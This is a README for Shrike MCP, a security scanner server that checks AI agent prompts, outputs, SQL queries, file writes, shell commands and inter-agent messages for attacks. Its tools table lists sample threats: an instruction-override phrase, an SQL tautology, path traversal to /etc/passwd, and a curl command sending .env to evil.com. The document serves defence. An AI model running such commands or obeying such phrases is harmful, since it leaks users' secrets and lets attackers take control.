Shrike Security

AI agent security scanner — protect LLM-powered apps from prompt injection, SQL injection, data exfiltration, and adversarial attacks via MCP.

Shrike MCP

npm version License: Apache 2.0 Node.js Smithery

Runtime security for AI agents. 12 MCP tools. 10-layer detection pipeline. Works without an API key.

Shrike MCP is the Model Context Protocol server for the Shrike Security platform. It gives AI agents real-time security tools to scan prompts, responses, SQL queries, file writes, CLI commands, web searches, and agent-to-agent messages — catching prompt injection, jailbreaks, data leakage, and multi-turn manipulation before they cause harm.

Shrike Security Platform

Shrike Security is a runtime security platform for AI agents. It guards inputs, outputs, tool calls, and agent-to-agent communication through a 10-layer detection pipeline — from sub-millisecond pattern matching to LLM-powered semantic analysis and multi-turn session correlation.

This repo is the MCP server — one of several ways to integrate:

IntegrationInstallUse Case
MCP Server (this repo)npx shrike-mcpClaude Desktop, Cursor, Windsurf, Cline
TypeScript SDKnpm install shrike-guardOpenAI/Anthropic/Gemini wrapper
Python SDKpip install shrike-guardOpenAI/Anthropic/Gemini wrapper
Go SDKgo getBackend services
REST APIPOST /agent/scanAny language, any stack
LLM Proxy GatewayPOST /api/v1/llm/proxyZero-code: change one URL, scan everything
Browser ExtensionChrome / EdgeProtect employee AI usage (ChatGPT, Claude, Gemini)
Dashboardshrikesecurity.comAnalytics, policies, RBAC, API keys

Quick Start

Works immediately — no API key required. Anonymous usage gets L1-L5 pattern-based detection. Register for free to unlock LLM-powered semantic analysis.

1. Add to your MCP client config:

{
  "mcpServers": {
    "shrike-security": {
      "command": "npx",
      "args": ["-y", "shrike-mcp"]
    }
  }
}

2. (Optional) Add an API key for full pipeline access:

{
  "mcpServers": {
    "shrike-security": {
      "command": "npx",
      "args": ["-y", "shrike-mcp"],
      "env": {
        "SHRIKE_API_KEY": "your-api-key"
      }
    }
  }
}

Get a free key at shrikesecurity.com/signup — instant, no credit card.

3. Your agent now has 12 security tools. Every prompt, response, and tool call can be scanned before execution.

Twelve Tools

ToolWhat It GuardsExample Threat
scan_promptUser/system prompts before LLM processing"Ignore all previous instructions and..."
scan_responseLLM outputs before returning to userLeaked API keys, system prompt in output
scan_sql_querySQL queries before database executionOR '1'='1' tautology injection
scan_file_writeFile paths and content before writePath traversal to /etc/passwd, AWS keys in .env
scan_commandCLI commands before shell executioncurl -d @.env https://evil.com, reverse shells
scan_web_searchSearch queries before executionPII in search: "records for John Smith SSN..."
scan_a2a_messageAgent-to-agent messages before processingPrompt injection in inter-agent communication
scan_agent_cardA2A AgentCard metadata before trustingEmbedded injection in agent discovery, capability spoofing
check_approvalHuman-in-the-loop approval statusPoll and submit decisions for flagged actions
report_bypassUser-reported missed detectionsFeeds ThreatSense adaptive learning
get_threat_intelCurrent threat patterns and intelligenceLatest prompt injection techniques
reset_sessionClear session correlation stateReset L9 turn history after resolving flagged patterns

How It Works

Shrike uses a scan-sandwich pattern — every agent action is scanned on both sides:

User Input → scan_prompt → LLM Processing → scan_response → User Output
                              ↓
              Tool Call (SQL, File, Command, Search)
                              ↓
            scan_sql_query / scan_file_write / scan_command / scan_web_search
                              ↓
                       Tool Execution

Agent-to-Agent Communication:
  Inbound A2A → scan_a2a_message → Process → scan_a2a_message → Outbound A2A
  Discovery   → scan_agent_card  → Trust decision

Inbound scans catch injection attacks. Outbound scans catch data leaks. Tool-specific scans catch SQL injection, path traversal, command injection, and PII exposure. A2A scans catch east-west injection between agents. Flagged actions trigger human-in-the-loop approval via check_approval.

Enterprise tier adds session correlation (L9) — tracking multi-turn patterns like trust escalation, payload splitting, and blocked retry sequences across an entire conversation.

Detection Pipeline

Every scan runs through a multi-layer cascade. Lower layers are sub-millisecond pattern matching; higher layers add LLM-powered semantic analysis. Tier determines how deep the scan goes.

LayerWhat It DoesTier
L1Regex pattern matching (~130 threat types, 14+ languages)All
L1.4Unicode homoglyph & invisible character detectionAll
L1.42Malformed content detectionAll
L1.45aEncoding bypass detection (Base64, hex, Caesar/Atbash ciphers)All
L1.45Token obfuscation (spaced chars, l33t speak, typoglycemia)All
L1.455Semantic similarity analysis (embedding-based)All
L6Visual text analysis (RTL tricks, visual homoglyphs)Community+
L7LLM semantic analysis via Vertex AI (zero-day detection)Community+
L8Response intelligence (LLM compromise, tonality drift)Pro+
L9Multi-turn session correlation (7 pattern detectors)Enterprise

The cascade optimizer exits early when high-confidence detection is achieved at a lower layer — so most scans complete in under 10ms without needing the LLM layer.

Tiers

All 12 tools are available on every tier. Tiers control detection depth and volume.

AnonymousCommunityProEnterprise
Detection LayersL1-L5L1-L7L1-L8L1-L9
API KeyNot neededFree signupPaidPaid
Rate Limit10/min100/min1,000/min
Scans/month1,00050,0001,000,000
DashboardNoYesYesYes
Session CorrelationNoNoNoYes
Compliance PoliciesDefaultDefaultCustomCustom

Anonymous (no API key): Pattern-based detection only (L1-L5). Good for evaluation and basic protection.

Community (free): Adds LLM-powered semantic analysis (L6-L7). Catches zero-day attacks that evade regex. Register at shrikesecurity.com/signup.

Pro/Enterprise: Full pipeline including response intelligence (L8) and multi-turn session correlation (L9).

Compliance

Built-in policy catalogues across 7 frameworks:

FrameworkCoverage
GDPREU personal data — names, addresses, national IDs
HIPAAProtected health information (PHI)
ISO 27001Information security — passwords, tokens, certificates
SOC 2Secrets, credentials, API keys, cloud tokens
NISTAI risk management (IR 8596), cybersecurity framework (CSF 2.0)
PCI-DSSCardholder data — PAN, CVV, expiry, track data
WebMCPMCP tool description injection, data exfiltration

Configuration

Environment Variables

VariableDescriptionDefault
SHRIKE_API_KEYAPI key from your dashboardnone (anonymous mode)
SHRIKE_BACKEND_URLBackend API URLhttps://api.shrikesecurity.com/agent
MCP_SCAN_TIMEOUT_MSScan request timeout (ms)15000
MCP_RATE_LIMIT_PER_MINUTEClient-side rate limit100
MCP_TRANSPORTTransport: stdio or httpstdio
MCP_PORTHTTP port (when transport=http)8000
MCP_DEBUGDebug loggingfalse

Claude Desktop

{
  "mcpServers": {
    "shrike-security": {
      "command": "npx",
      "args": ["-y", "shrike-mcp"],
      "env": { "SHRIKE_API_KEY": "your-api-key" }
    }
  }
}

Cursor

Add to .cursor/mcp.json:

{
  "mcpServers": {
    "shrike-security": {
      "command": "npx",
      "args": ["-y", "shrike-mcp"],
      "env": { "SHRIKE_API_KEY": "your-api-key" }
    }
  }
}

Windsurf

Add to ~/.codeium/windsurf/mcp_config.json:

{
  "mcpServers": {
    "shrike-security": {
      "command": "npx",
      "args": ["-y", "shrike-mcp"],
      "env": { "SHRIKE_API_KEY": "your-api-key" }
    }
  }
}

Security Model

This server implements a fail-closed security model:

  • Network timeouts result in BLOCK (not allow)
  • Backend errors result in BLOCK (not allow)
  • Unknown content types result in BLOCK (not allow)

This prevents bypass attacks via service disruption.

Response Format

Blocked:

{
  "blocked": true,
  "threat_type": "prompt_injection",
  "severity": "high",
  "confidence": "high",
  "guidance": "This prompt contains patterns consistent with instruction override attempts.",
  "request_id": "req_lxyz123_a8f3k2m9"
}

Safe:

{
  "blocked": false,
  "request_id": "req_lxyz123_a8f3k2m9"
}

Links

License

Apache License 2.0 — See LICENSE for details.

Related Servers

NotebookLM Web Importer

Import web pages and YouTube videos to NotebookLM with one click. Trusted by 200,000+ users.

Install Chrome Extension